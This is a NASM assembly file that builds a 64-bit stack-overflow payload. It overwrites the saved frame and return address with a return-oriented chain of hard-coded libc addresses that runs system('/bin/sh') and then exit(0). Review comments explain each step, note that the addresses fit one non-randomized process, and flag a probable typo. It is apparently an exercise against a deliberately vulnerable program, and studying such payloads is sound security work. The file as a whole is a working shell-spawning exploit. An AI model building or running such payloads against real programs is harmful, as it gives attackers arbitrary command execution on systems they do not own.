bits 64

; Stack-overflow payload for a 64-bit (SysV) target, laid out as raw bytes:
;   0x210 bytes of filler ("/bin/sh" + zeros, then NOPs that are never executed),
;   8 bytes that land on the saved rbp,
;   a 7-qword return-oriented chain of libc addresses: system("/bin/sh"), exit(0).
; Assembled size: 0x10 + 0x1f0 + 0x10 + 0x8 + 7*8 = 0x250 bytes (the commented-out
; "gdb version" qword is not assembled).
;
; Every address below is hard-coded for one specific process image: the libc
; addresses (0x7ffff7e...) and the stack pointer value (0x7fffffffe2a0) only hold
; when that process maps libc and its stack at exactly these locations -- which is
; why a separate "gdb version" of the buffer pointer exists. With address-space
; randomization all of these constants are wrong, and writing straight over the
; saved rbp assumes no stack canary lies between the buffer and the frame data;
; presumably the target is built without those mitigations -- confirm against the
; actual build flags, which are not shown here.

; NOTE(review): _start is exported but the bytes at _start are data, not code;
; presumably the file is assembled to a flat binary and used as input, not run as
; an executable -- confirm from the build command.
global _start

_start:

; we place /bin/sh and a few zero bytes at the start (16B)

; 7 characters + 9 zero bytes = 16 bytes; the first zero NUL-terminates the string.
db '/bin/sh', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00


; 0x1f0 = 496 bytes; together with the 16 bytes above that is 0x200 = 512 bytes.
times 0x1f0 nop ; fill buffer, i.e., 512B in total


; NOTE(review): "rbp+0x210" reads like a typo for rbp-0x210 (buffer 0x210 bytes
; below the saved rbp); 0x200 + 0x10 = 0x210 fits that reading -- confirm.
times 0x10 nop ; buffer is at rbp+0x210, so skip 0x10 more

; These 8 bytes replace the saved rbp; the chain below never reads rbp, so the
; value is presumably irrelevant.
times 0x8 nop ; overwrite saved rbp


; First overwritten return address: gadget that pops the next qword into rdi
; (first integer argument under SysV) and returns.
dq 0x7ffff7e007e5 ; pop rdi + ret

; real version

; Value popped into rdi: address of the "/bin/sh" string at the start of the
; buffer. Environment-specific -- differs under a debugger (see "gdb version").
dq 0x7fffffffe2a0 ; ptr to buffer, which contains "/bin/sh" at the start

; gdb version

; dq 0x7fffffffe250 ; ptr to buffer, which contains "/bin/sh" at the start


; Lone ret: consumes 8 bytes of stack before system() is entered -- presumably to
; restore the 16-byte stack alignment libc expects at a call boundary, since a
; misaligned stack can fault in libc's SSE code.
dq 0x7ffff7e007e6 ; just ret -- this will change the stack by 8B

; Return into system(); rdi already holds the string pointer.
dq 0x7ffff7e25490 ; system("/bin/sh")

; Second gadget use: rdi <- 0, then return into exit() so the process ends with
; status 0 once the shell returns.
dq 0x7ffff7e007e5 ; pop rdi

dq 0

dq 0x7ffff7e17680 ; exit(0)